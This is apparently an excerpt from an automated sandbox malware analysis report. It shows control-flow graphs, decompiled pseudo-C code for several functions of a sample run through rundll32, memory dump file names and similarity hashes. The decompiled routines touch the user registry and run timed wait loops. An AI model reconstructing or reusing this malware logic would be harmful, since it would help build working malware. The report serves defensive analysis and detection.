                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 146 50a3dd9-50a3e1b call 50aa7bc call 50a6a12 151 50a3f69-50a3f6b 146->151 152 50a3e21-50a3e2c 146->152 153 50a3f6c-50a3f72 151->153 155 50a3e33-50a3e35 152->155 156 50a3e3b-50a3e47 call 50aa72d 155->156 157 50a3f5c-50a3f5e 155->157 163 50a3e49 156->163 164 50a3e4c-50a3e5e call 50a809f 156->164 158 50a3f5f-50a3f67 call 50a9039 157->158 158->153 163->164 167 50a3f4b-50a3f4d 164->167 168 50a3e64-50a3e80 call 50a809f 164->168 169 50a3f4e-50a3f53 167->169 173 50a3e82-50a3e9f call 50a6bfa call 50a9039 168->173 174 50a3ea1-50a3ea3 168->174 169->158 172 50a3f55-50a3f5a call 50a1f99 169->172 172->158 178 50a3ea4-50a3ea6 173->178 174->178 180 50a3eac-50a3eb3 178->180 181 50a3f41-50a3f49 call 50a9039 178->181 183 50a3ef4-50a3f1f call 50a8f83 call 50a1c74 180->183 184 50a3eb5-50a3ecc call 50a809f 180->184 181->169 198 50a3f39-50a3f3c call 50a9039 183->198 199 50a3f21-50a3f37 call 50a42ea 183->199 193 50a3ece-50a3eeb call 50a6bfa call 50a9039 184->193 194 50a3eed-50a3eef 184->194 195 50a3ef0-50a3ef2 193->195 194->195 195->181 195->183 198->181 199->198
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E050A3DD9(void* __eflags, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t60;
				void* _t70;
				intOrPtr _t75;

				_push(0x2c);
				_push(0);
				_push( &_v84);
				_v88 = 0;
				L050AA7BC();
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t39 =  *0x50ad27c; // 0x214a5a8
				_t5 = _t39 + 0x50aee40; // 0x410025
				_t41 = E050A6A12(_t5);
				_t75 = _t41;
				_v16 = _t75;
				if(_t75 == 0) {
					_t70 = 8;
					L24:
					return _t70;
				}
				__imp__(_t75);
				_t43 =  *0x50ad114(_t75, _a4, _t41); // executed
				if(_t43 != 0) {
					_t70 = 1;
					L22:
					E050A9039(_t43, _v16);
					goto L24;
				}
				if(E050AA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t43 = E050A809F(0,  *0x50ad33c);
				_v12 = _t43;
				if(_t43 == 0) {
					_t70 = 8;
					goto L19;
				} else {
					_t48 =  *0x50ad27c; // 0x214a5a8
					_t11 = _t48 + 0x50ae81a; // 0x65696c43
					_t51 = E050A809F(0, _t11);
					_t77 = _t51;
					if(_t51 == 0) {
						_t70 = 8;
					} else {
						_t70 = E050A6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
						_t51 = E050A9039(_t68, _t77);
					}
					if(_t70 != 0) {
						L17:
						_t43 = E050A9039(_t51, _v12);
						L19:
						_t76 = _a4;
						if(_a4 != 0) {
							_t43 = E050A1F99(_t76);
						}
						goto L22;
					} else {
						if(( *0x50ad260 & 0x00000001) == 0) {
							L14:
							E050A8F83(_t70, _v88, _v84,  *0x50ad270, 0);
							_t70 = E050A1C74(_v88,  &_v80,  &_v76, 0);
							if(_t70 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t70 = E050A42EA( &_v40, 0);
							}
							_t51 = E050A9039(_t56, _v88);
							goto L17;
						}
						_t60 =  *0x50ad27c; // 0x214a5a8
						_t18 = _t60 + 0x50ae823; // 0x65696c43
						_t51 = E050A809F(0, _t18);
						_t79 = _t51;
						if(_t51 == 0) {
							_t70 = 8;
						} else {
							_t70 = E050A6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
							_t51 = E050A9039(_t65, _t79);
						}
						if(_t70 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                                                                                                                                                                                                                    0x050a3de4
                                                                                                                                                                                                                                    0x050a3de9
                                                                                                                                                                                                                                    0x050a3dea
                                                                                                                                                                                                                                    0x050a3deb
                                                                                                                                                                                                                                    0x050a3dee
                                                                                                                                                                                                                                    0x050a3df5
                                                                                                                                                                                                                                    0x050a3dfb
                                                                                                                                                                                                                                    0x050a3dfc
                                                                                                                                                                                                                                    0x050a3dfd
                                                                                                                                                                                                                                    0x050a3dfe
                                                                                                                                                                                                                                    0x050a3dff
                                                                                                                                                                                                                                    0x050a3e00
                                                                                                                                                                                                                                    0x050a3e08
                                                                                                                                                                                                                                    0x050a3e0f
                                                                                                                                                                                                                                    0x050a3e14
                                                                                                                                                                                                                                    0x050a3e18
                                                                                                                                                                                                                                    0x050a3e1b
                                                                                                                                                                                                                                    0x050a3f6b
                                                                                                                                                                                                                                    0x050a3f6e
                                                                                                                                                                                                                                    0x050a3f72
                                                                                                                                                                                                                                    0x050a3f72
                                                                                                                                                                                                                                    0x050a3e22
                                                                                                                                                                                                                                    0x050a3e2d
                                                                                                                                                                                                                                    0x050a3e35
                                                                                                                                                                                                                                    0x050a3f5e
                                                                                                                                                                                                                                    0x050a3f5f
                                                                                                                                                                                                                                    0x050a3f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3f62
                                                                                                                                                                                                                                    0x050a3e47
                                                                                                                                                                                                                                    0x050a3e49
                                                                                                                                                                                                                                    0x050a3e49
                                                                                                                                                                                                                                    0x050a3e54
                                                                                                                                                                                                                                    0x050a3e5b
                                                                                                                                                                                                                                    0x050a3e5e
                                                                                                                                                                                                                                    0x050a3f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3e64
                                                                                                                                                                                                                                    0x050a3e64
                                                                                                                                                                                                                                    0x050a3e69
                                                                                                                                                                                                                                    0x050a3e72
                                                                                                                                                                                                                                    0x050a3e77
                                                                                                                                                                                                                                    0x050a3e80
                                                                                                                                                                                                                                    0x050a3ea3
                                                                                                                                                                                                                                    0x050a3e82
                                                                                                                                                                                                                                    0x050a3e98
                                                                                                                                                                                                                                    0x050a3e9a
                                                                                                                                                                                                                                    0x050a3e9a
                                                                                                                                                                                                                                    0x050a3ea6
                                                                                                                                                                                                                                    0x050a3f41
                                                                                                                                                                                                                                    0x050a3f44
                                                                                                                                                                                                                                    0x050a3f4e
                                                                                                                                                                                                                                    0x050a3f4e
                                                                                                                                                                                                                                    0x050a3f53
                                                                                                                                                                                                                                    0x050a3f55
                                                                                                                                                                                                                                    0x050a3f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3eac
                                                                                                                                                                                                                                    0x050a3eb3
                                                                                                                                                                                                                                    0x050a3ef4
                                                                                                                                                                                                                                    0x050a3f05
                                                                                                                                                                                                                                    0x050a3f1b
                                                                                                                                                                                                                                    0x050a3f1f
                                                                                                                                                                                                                                    0x050a3f24
                                                                                                                                                                                                                                    0x050a3f2a
                                                                                                                                                                                                                                    0x050a3f37
                                                                                                                                                                                                                                    0x050a3f37
                                                                                                                                                                                                                                    0x050a3f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3f3c
                                                                                                                                                                                                                                    0x050a3eb5
                                                                                                                                                                                                                                    0x050a3eba
                                                                                                                                                                                                                                    0x050a3ec3
                                                                                                                                                                                                                                    0x050a3ec8
                                                                                                                                                                                                                                    0x050a3ecc
                                                                                                                                                                                                                                    0x050a3eef
                                                                                                                                                                                                                                    0x050a3ece
                                                                                                                                                                                                                                    0x050a3ee4
                                                                                                                                                                                                                                    0x050a3ee6
                                                                                                                                                                                                                                    0x050a3ee6
                                                                                                                                                                                                                                    0x050a3ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3ef2
                                                                                                                                                                                                                                    0x050a3ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 58da5f4416770dcfc1b0af40a937028de072691b409b2f2edcba258532d5a140
                                                                                                                                                                                                                                    • Instruction ID: b64f39574ab157f0b358fcfa184458386416b35669d5cbbf27dee5b32647f11e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58da5f4416770dcfc1b0af40a937028de072691b409b2f2edcba258532d5a140
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB416E73A10218AEDB11EFE4EC89DEF7BBDBF18240B004525F506EA151D775D9458B90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A6786, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 206 50a6786-50a67b2 call 50aa7bc 210 50a67b8-50a6808 call 50ab0c8 206->210 211 50a6913-50a6919 206->211 218 50a680a-50a680d 210->218 219 50a6883-50a6888 210->219 215 50a691c-50a6923 211->215 220 50a6818 218->220 221 50a680f call 50a73fd 218->221 222 50a6889-50a688d 219->222 226 50a6822 220->226 227 50a6814-50a6816 221->227 224 50a688f-50a6891 222->224 225 50a689d-50a68a1 222->225 224->225 225->222 228 50a68a3-50a68ac 225->228 229 50a6825-50a6829 226->229 227->220 227->226 228->215 230 50a683b-50a6864 call 50a8504 229->230 231 50a682b-50a6832 229->231 236 50a68ae-50a68b3 230->236 237 50a6866-50a686f 230->237 231->230 233 50a6834 231->233 233->230 238 50a68d2-50a68da 236->238 239 50a68b5-50a68bb 236->239 237->229 240 50a6871-50a6880 call 50a3bf1 237->240 241 50a68e0-50a6908 call 50ab0c8 238->241 239->219 243 50a68bd-50a68d0 call 50aa1b0 239->243 240->219 241->229 251 50a690e 241->251 243->241 251->219
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E050A6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v88;
				char _v92;
				char* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t59;
				signed int _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t44 =  &_v88;
				_v92 = 0;
				L050AA7BC();
				__imp__(0, 1, 0, _t44, 0, 0x2c);
				_v44 = _t44;
				if(_t44 == 0) {
					__imp__();
					_v8 = _t44;
				} else {
					_v20 = 0;
					_v16 = 0;
					L050AB0C8();
					_t72 = __imp__; // 0x76d7f710
					_v36 = _t44;
					_v32 = __edx;
					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x50ad240, 0, 0xff676980, 0xffffffff);
					_t48 =  *0x50ad26c; // 0x374
					_t64 = __imp__; // 0x76d7f730
					_v40 = _t48;
					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
					_v8 = _t50;
					if(_t50 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x50ad24c = 5;
						} else {
							_t63 = E050A73FD(__edx); // executed
							if(_t63 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x50ad260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t66 = _v12;
						_t53 = _t66 << 4;
						_t71 = _t75 + (_t66 << 4) - 0x54;
						_t67 = _t66 + 1;
						_v24 = _t66 + 1;
						_t55 = E050A8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16);
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E050A3BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x50ad244);
							goto L21;
						} else {
							__eflags =  *0x50ad248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E050AA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x50ad248);
								L21:
								L050AB0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0);
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x50ad238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                                                                                                                                                                    0x050a6793
                                                                                                                                                                                                                                    0x050a6798
                                                                                                                                                                                                                                    0x050a679b
                                                                                                                                                                                                                                    0x050a67a7
                                                                                                                                                                                                                                    0x050a67af
                                                                                                                                                                                                                                    0x050a67b2
                                                                                                                                                                                                                                    0x050a6913
                                                                                                                                                                                                                                    0x050a6919
                                                                                                                                                                                                                                    0x050a67b8
                                                                                                                                                                                                                                    0x050a67c6
                                                                                                                                                                                                                                    0x050a67c9
                                                                                                                                                                                                                                    0x050a67cc
                                                                                                                                                                                                                                    0x050a67d1
                                                                                                                                                                                                                                    0x050a67da
                                                                                                                                                                                                                                    0x050a67e5
                                                                                                                                                                                                                                    0x050a67e8
                                                                                                                                                                                                                                    0x050a67ea
                                                                                                                                                                                                                                    0x050a67ef
                                                                                                                                                                                                                                    0x050a67f7
                                                                                                                                                                                                                                    0x050a6801
                                                                                                                                                                                                                                    0x050a6805
                                                                                                                                                                                                                                    0x050a6808
                                                                                                                                                                                                                                    0x050a680d
                                                                                                                                                                                                                                    0x050a6818
                                                                                                                                                                                                                                    0x050a6818
                                                                                                                                                                                                                                    0x050a680f
                                                                                                                                                                                                                                    0x050a680f
                                                                                                                                                                                                                                    0x050a6816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a6816
                                                                                                                                                                                                                                    0x050a6822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a6825
                                                                                                                                                                                                                                    0x050a6829
                                                                                                                                                                                                                                    0x050a6834
                                                                                                                                                                                                                                    0x050a6834
                                                                                                                                                                                                                                    0x050a683b
                                                                                                                                                                                                                                    0x050a6844
                                                                                                                                                                                                                                    0x050a684b
                                                                                                                                                                                                                                    0x050a6854
                                                                                                                                                                                                                                    0x050a6857
                                                                                                                                                                                                                                    0x050a685a
                                                                                                                                                                                                                                    0x050a6861
                                                                                                                                                                                                                                    0x050a6864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a6866
                                                                                                                                                                                                                                    0x050a6869
                                                                                                                                                                                                                                    0x050a686c
                                                                                                                                                                                                                                    0x050a686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a6871
                                                                                                                                                                                                                                    0x050a6880
                                                                                                                                                                                                                                    0x050a6880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a68ae
                                                                                                                                                                                                                                    0x050a68ae
                                                                                                                                                                                                                                    0x050a68b3
                                                                                                                                                                                                                                    0x050a68d2
                                                                                                                                                                                                                                    0x050a68d4
                                                                                                                                                                                                                                    0x050a68d9
                                                                                                                                                                                                                                    0x050a68da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a68b5
                                                                                                                                                                                                                                    0x050a68b5
                                                                                                                                                                                                                                    0x050a68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a68bd
                                                                                                                                                                                                                                    0x050a68bd
                                                                                                                                                                                                                                    0x050a68c2
                                                                                                                                                                                                                                    0x050a68c4
                                                                                                                                                                                                                                    0x050a68c9
                                                                                                                                                                                                                                    0x050a68ca
                                                                                                                                                                                                                                    0x050a68e0
                                                                                                                                                                                                                                    0x050a68e0
                                                                                                                                                                                                                                    0x050a68e8
                                                                                                                                                                                                                                    0x050a68f3
                                                                                                                                                                                                                                    0x050a68f6
                                                                                                                                                                                                                                    0x050a6901
                                                                                                                                                                                                                                    0x050a6903
                                                                                                                                                                                                                                    0x050a6905
                                                                                                                                                                                                                                    0x050a6908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a690e
                                                                                                                                                                                                                                    0x050a6908
                                                                                                                                                                                                                                    0x050a68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a68b3
                                                                                                                                                                                                                                    0x050a6883
                                                                                                                                                                                                                                    0x050a6885
                                                                                                                                                                                                                                    0x050a6888
                                                                                                                                                                                                                                    0x050a6889
                                                                                                                                                                                                                                    0x050a6889
                                                                                                                                                                                                                                    0x050a688d
                                                                                                                                                                                                                                    0x050a6897
                                                                                                                                                                                                                                    0x050a6897
                                                                                                                                                                                                                                    0x050a689d
                                                                                                                                                                                                                                    0x050a68a0
                                                                                                                                                                                                                                    0x050a68a0
                                                                                                                                                                                                                                    0x050a68a6
                                                                                                                                                                                                                                    0x050a68a6
                                                                                                                                                                                                                                    0x050a6923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0a199a0f65c7b78be81435b01184f625a70f0a6883cc0b160be0980145faf026
                                                                                                                                                                                                                                    • Instruction ID: 86c277dee5bda9c0959418abf2f50611777a50591718d4ea383ee062716e3874
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a199a0f65c7b78be81435b01184f625a70f0a6883cc0b160be0980145faf026
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 845145B2D11229AADF109FD4EC45DEEBFBDFF49360F244216F811A6180DB759A41CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A269C, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 252 50a269c-50a26b0 253 50a26ba-50a26cc call 50a6b43 252->253 254 50a26b2-50a26b7 252->254 257 50a26ce-50a26d2 253->257 258 50a2720-50a272d 253->258 254->253 260 50a26d9-50a26de 257->260 259 50a272f-50a2746 258->259 263 50a2748-50a2759 259->263 264 50a2784-50a27a6 259->264 260->259 262 50a26e0-50a26f0 260->262 262->259 266 50a26f2-50a26ff 262->266 263->264 268 50a275b-50a2764 263->268 271 50a270f-50a271e 266->271 272 50a2701-50a270d call 50a2496 266->272 273 50a2766-50a2772 call 50a2496 268->273 274 50a2775-50a2778 268->274 271->259 272->271 273->274 274->264
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: be684eb399482195b2c8a2cd4948a346434758d1023a3179bbcd70d9b8b9adaa
                                                                                                                                                                                                                                    • Instruction ID: 3af9d3a97ff51c678d7afa0216b12725163e4044b93c45230bd42605cb32e31c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be684eb399482195b2c8a2cd4948a346434758d1023a3179bbcd70d9b8b9adaa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56311976A10606EFDB11DFA9E985AAEFBF9FF58200F114039E405D7250EB34EE428B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A73FD, Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 280 50a73fd-50a7410 call 50aa72d 282 50a7415-50a7417 280->282 283 50a7419 282->283 284 50a741c-50a743e call 50a1262 282->284 283->284 287 50a74fd-50a7502 284->287 288 50a7444-50a745e 284->288 289 50a7509-50a750f 287->289 290 50a7504 call 50a1f99 287->290 293 50a74ed-50a74ef 288->293 294 50a7464-50a7480 call 50a7cb8 288->294 290->289 295 50a74f0-50a74f5 293->295 294->295 298 50a7482-50a749b call 50a89d6 294->298 295->287 301 50a74bd-50a74eb call 50a2659 298->301 302 50a749d-50a74a4 298->302 301->295 302->301 303 50a74a6-50a74b8 call 50a89d6 302->303 303->301
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E050A73FD(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E050AA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x50ad27c; // 0x214a5a8
				_t4 = _t24 + 0x50aede0; // 0x71f9388
				_t5 = _t24 + 0x50aed88; // 0x4f0053
				_t45 = E050A1262( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x50ad0f4(_v16, 0,  &_v12);
					_t52 = __imp__; // 0x76d25520
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x50ad27c; // 0x214a5a8
						_t11 = _t32 + 0x50aedd4; // 0x71f937c
						_t48 = _t11;
						_t12 = _t32 + 0x50aed88; // 0x4f0053
						_t55 = E050A7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x50ad27c; // 0x214a5a8
							_t13 = _t35 + 0x50aee1e; // 0x30314549
							if(E050A89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x50ad25c - 6;
								if( *0x50ad25c <= 6) {
									_t42 =  *0x50ad27c; // 0x214a5a8
									_t15 = _t42 + 0x50aec2a; // 0x52384549
									E050A89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x50ad27c; // 0x214a5a8
							_t17 = _t38 + 0x50aee18; // 0x71f93c0
							_t18 = _t38 + 0x50aedf0; // 0x680043
							_t40 = E050A2659(_v8, 0x80000001, _t55, _t18, _t17);
							_t45 = _t40;
							 *_t52( *0x50ad238, 0, _t55);
						}
					}
					 *_t52( *0x50ad238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E050A1F99(_t54);
				}
				return _t45;
			}


















                                                                                                                                                                                                                                    0x050a73fd
                                                                                                                                                                                                                                    0x050a740d
                                                                                                                                                                                                                                    0x050a7410
                                                                                                                                                                                                                                    0x050a7417
                                                                                                                                                                                                                                    0x050a7419
                                                                                                                                                                                                                                    0x050a7419
                                                                                                                                                                                                                                    0x050a741c
                                                                                                                                                                                                                                    0x050a7421
                                                                                                                                                                                                                                    0x050a7428
                                                                                                                                                                                                                                    0x050a743a
                                                                                                                                                                                                                                    0x050a743e
                                                                                                                                                                                                                                    0x050a744c
                                                                                                                                                                                                                                    0x050a7452
                                                                                                                                                                                                                                    0x050a745a
                                                                                                                                                                                                                                    0x050a745e
                                                                                                                                                                                                                                    0x050a74ef
                                                                                                                                                                                                                                    0x050a74ef
                                                                                                                                                                                                                                    0x050a7464
                                                                                                                                                                                                                                    0x050a7464
                                                                                                                                                                                                                                    0x050a7469
                                                                                                                                                                                                                                    0x050a7469
                                                                                                                                                                                                                                    0x050a7470
                                                                                                                                                                                                                                    0x050a747c
                                                                                                                                                                                                                                    0x050a747e
                                                                                                                                                                                                                                    0x050a7480
                                                                                                                                                                                                                                    0x050a7482
                                                                                                                                                                                                                                    0x050a7489
                                                                                                                                                                                                                                    0x050a749b
                                                                                                                                                                                                                                    0x050a749d
                                                                                                                                                                                                                                    0x050a74a4
                                                                                                                                                                                                                                    0x050a74a6
                                                                                                                                                                                                                                    0x050a74ad
                                                                                                                                                                                                                                    0x050a74b8
                                                                                                                                                                                                                                    0x050a74b8
                                                                                                                                                                                                                                    0x050a74a4
                                                                                                                                                                                                                                    0x050a74bd
                                                                                                                                                                                                                                    0x050a74c2
                                                                                                                                                                                                                                    0x050a74c9
                                                                                                                                                                                                                                    0x050a74d9
                                                                                                                                                                                                                                    0x050a74e7
                                                                                                                                                                                                                                    0x050a74e9
                                                                                                                                                                                                                                    0x050a74e9
                                                                                                                                                                                                                                    0x050a7480
                                                                                                                                                                                                                                    0x050a74fb
                                                                                                                                                                                                                                    0x050a74fb
                                                                                                                                                                                                                                    0x050a74fd
                                                                                                                                                                                                                                    0x050a7502
                                                                                                                                                                                                                                    0x050a7504
                                                                                                                                                                                                                                    0x050a7504
                                                                                                                                                                                                                                    0x050a750f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
